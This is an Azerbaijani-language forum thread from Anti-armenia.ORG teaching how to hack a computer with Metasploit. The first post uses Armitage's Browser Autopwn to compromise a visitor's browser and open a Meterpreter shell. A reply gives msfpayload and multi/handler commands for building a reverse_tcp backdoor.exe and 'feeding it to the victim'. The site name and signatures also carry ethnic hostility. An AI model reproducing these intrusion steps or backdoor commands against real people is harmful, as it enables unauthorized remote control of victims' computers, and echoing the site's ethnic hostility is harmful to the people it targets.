Anti-armenia.ORG - Forumlar - Metasploit ilə Kompun hacklanması



Istifadəçi
     2012-07-14 20:35 GMT                 

StealtH


Security
Mesaj Sayı : 839
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   25  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Sumqayıt
Ölkə :
Məslək : Pan - Turkism
Yaş : 34
Mesaj :

Mövzunu Paylaş!


əvvəlcə bizə proqramın özü lazımdır
onu burdan indirə bilərsiz

http://www.metasploit.com/download/

proqramı yükləyib qurtarırıq vı sonra açırırq

açılan pəncərə bunu yazırıq

Kod:
$ msfrpcd -P test -S -U msf  -p 1337


-P test - parol "test"
-S - SSL söndürülməsi
-U msf - user "msf"
-p 1337 - port 1337

sonra serveri işə salırırq

Kod:
$ msfrpcd -P test -S -U msf -p 1337[*] XMLRPC starting on 0.0.0.0:1337 (NO SSL):Basic...[*] XMLRPC backgrounding at 2011-05-29 21:13:39 +0600...


sonra Armitage işə salırırq

Kod:
$ armitage


http://s017.radikal.ru/i415/1207/93/bd681ee18cea.png


user və pass yerinə yuxarıda yazdığlarımımzı yazırırq

və sonra Armitage: pəncərəsi açılacaq

http://s50.radikal.ru/i128/1207/4e/5943faba1a96.jpg


sonra menuda Attacks -da Browser Autopwn... seçirik

http://s019.radikal.ru/i611/1207/de/022e31c549e6.png


açılan pəncərədə verilənləi nastroyka edirik

http://s019.radikal.ru/i623/1207/04/1e20caa664f3.png


LHOST - bura hackladığıvız kompun İP sini yazırsız
SRVPORT - daxil olan connectin kompunuza qoşulması üçün port
URIPATH - bu da exploititn adresi misal üçün: http://192.168.1.2/test11/test22/exploit

sonra Launch basırırq. Metasploit avtomatik olaraq 19 exploiti serverde test edib brauzerdə tapdığı vule uyğun olaraq exploitı star verəcək

http://s52.radikal.ru/i136/1207/a6/d075a303a93a.jpg


metasploit bizə tapılmış açıq tipinə uyğun olaraq url generation edecek
mən misal üçün İE 6 üçün olan açığı götürəcəm http://192.168.1.2:8080/nDfYl21b5bCma85

http://s15.radikal.ru/i189/1207/ba/7762442b846a.jpg


metasploit uğurlu səkildə işlədi və biz meterpreter dostupunu əldə etdik hansınnanki CMD işə salmaq olacaq

Meterpreter -> Interact -> Command Shell

http://s019.radikal.ru/i611/1207/a5/df62aec32033.jpg


vəssalam biz artıq lamerin kompundayıq
sonra ne istesez ede bilərsiz

http://s019.radikal.ru/i635/1207/32/c9f0062e38b7.jpg

Bura Ergenekon, təpədən-dırnağa Türkəm!

http://s41.radikal.ru/i092/1308/a7/c6e81f41523b.png
Anti-armenia.ORG
     
 

Istifadəçi
     2012-07-14 20:47 GMT                 

PwnSecurity


İstifadəçi
Mesaj Sayı : 8
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Maraqlı bir izahat idi oxumağa vaxtım olmadı ama göründüyü qədərilə həddindən artıq uzun yolu seçmisən.

Ən gözəl yol: Əgər OS Linuxdursa Ruby qurmağa ehtiyyac yoxdur sadəcə Metasploit Framework olsa bəs edər, əgər OS Windowsdursa o zaman Ruby qurulmağı vacibdir.

Linuxda:

Terminal(Console) açıb yazırıq:
Kod:
msfpayload windows/meterpreter/reverse_tcp LHOST=WANIP LPORT=PORT x > /root/PATH/backdoor.exe


təxminən bir dəqiqə gözləyirik backdoorumuz yaradılır və bunu qurbana yediririk keçirik Metasploit Console-a

Terminal(Console) açıb bu qeyd etdiyim əmrləri yerinə yetiririk:
Kod:
msfconsole

biraz gözlədikdən sonra "msf>" bu şəkildə bir command line gələcək davam edək:

use exploit/multi/handler
set LHOST LANIP
set LPORT PORT
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
oit[/code]

sıra ilə bunları yazdıqdan sonra gözləyirik və qurbandan bağlantı sağlam gələrsə bizdə artıq belə bir command line əmələ gələcək

"meterpreter>"

bu tipdə və biz ora "help" yazaraq bütün komandaları rahatlıqla görə biləri

StealtH Təşəkkür.

Anti-armenia.ORG
     
 

Istifadəçi
     2012-07-15 09:23 GMT                 

M4NY3T!K


Gold
Mesaj Sayı : 606
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   7  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Naxçıvan
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Əla Bro Təşəkkürlər Lazımlı Dərslikdir

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
     
 

 
Site By: Ferid23 | Designed: MCH & FERID23  | Site: Anti-armenia.ORG